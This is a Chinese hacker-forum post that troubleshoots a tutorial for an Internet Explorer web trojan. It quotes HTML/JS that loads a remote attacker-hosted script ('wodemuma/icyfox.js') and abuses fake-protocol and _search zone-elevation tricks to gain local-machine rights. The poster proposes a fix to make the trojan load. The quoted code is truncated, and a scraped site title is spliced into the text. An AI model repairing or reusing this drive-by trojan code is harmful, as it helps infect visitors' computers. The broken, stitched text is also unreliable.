來源:黑基論壇
都原創(chuàng)偶也原創(chuàng),嘿嘿
“打造完美的IE網(wǎng)頁木馬”-------http://bbs.hackbase.com/viewthread.php?tid=2705719&fpage=1
這篇精華大家都看了吧,有人說很好收藏了,有人說根本沒用,
“打造完美IE木馬”的紕漏
。這到底行不行呢?現(xiàn)在我來說說我實(shí)驗(yàn)后的看法:
我們按他說的做:一個(gè)HTM,一個(gè)JS。大家看愿文的HTM部分:
============================================
//此處設(shè)置上面icyfox.js文件的網(wǎng)絡(luò)地址
//請(qǐng)把http://www.godog.y365.com/wodemuma/icyfox.js改為你的icyfox.js文件實(shí)際上傳地址
jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(/\//g,’//’);
WIE=navigator.appVersion;
if(WIE.indexOf("MSIE 5.0")>-1){
/*IE 5.0利用iframe標(biāo)簽,src屬性設(shè)為icyfox://則會(huì)使此標(biāo)簽具備“我的電腦”域的權(quán)限,原因是因?yàn)閕cyfox://是不存在的協(xié)議,所以會(huì)IE會(huì)利用res://協(xié)議打開SHDOCLC.DLL中的語法錯(cuò)誤頁syntax.htm,而且SHDOCLC.DLL又位于系統(tǒng)目錄中,為在 icyfox.js中得到WINDOWS系統(tǒng)目錄和系統(tǒng)盤提供數(shù)據(jù);*/
document.write("
setTimeout("muma0()",1000);
}
else {
===================================
大家看這里
原文中 “//請(qǐng)把http://www.godog.y365.com/wodemuma/icyfox.js改為你的icyfox.js文件實(shí)際上傳地址
jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(/\//g,’//’); “ 最后的replace(/\//g,’//’); 我想可能是作者的失誤,要不就是我的機(jī)器問題了,如果直接打開這個(gè)HTM是不會(huì)想作者說的引用icyfox.js的,這里有點(diǎn)小問題--------replace(/\//g,’//’);這句話的意思是把全部的”/“用”//“取代,
電腦資料
《“打造完美IE木馬”的紕漏》(http://www.ishadingyu.com)。這里應(yīng)該該為-----replace(/\//g,“//”);看出區(qū)別了嗎? 把單撇該為引號(hào), 否則瀏覽器是會(huì)報(bào)錯(cuò)而不能轉(zhuǎn)向ICYFOX.JS改了后IE自動(dòng)打開 icyfox/// (如果你是沒改JS文件名的話)
我是IE6.0SP1,還是打不開木馬程序。作者說“/*IE 5.0利用iframe標(biāo)簽,src屬性設(shè)為icyfox://則會(huì)使此標(biāo)簽具備“我的電腦”域的權(quán)限,原因是因?yàn)閕cyfox://是不存在的協(xié)議,所以會(huì)IE會(huì)利用res://協(xié)議打開SHDOCLC.DLL中的語法錯(cuò)誤頁syntax.htm,而且SHDOCLC.DLL又位于系統(tǒng)目錄中,為在 icyfox.js中得到WINDOWS系統(tǒng)目錄和系統(tǒng)盤提供數(shù)據(jù);*/ ”“/*IE5.5、 IE6.0則利用_search漏洞,把打開的地址設(shè)為icyfox://,從而使_search搜索框具備“我的電腦”域的權(quán)限,因?yàn)樵贗E6.0中無法用上面的iframe漏洞,IE5.5應(yīng)該可以用,我沒有測(cè)試。這樣做的結(jié)果會(huì)打開搜索欄,有點(diǎn)遺憾!*/ ”
我沒法實(shí)驗(yàn),我的瀏覽起并沒用res://協(xié)議打開也沒打開搜索欄,用Microsoft.XMLHTTP控件也不成功。
就是這些,希望我說的是對(duì)的,給實(shí)驗(yàn)的朋友一些幫助,呵呵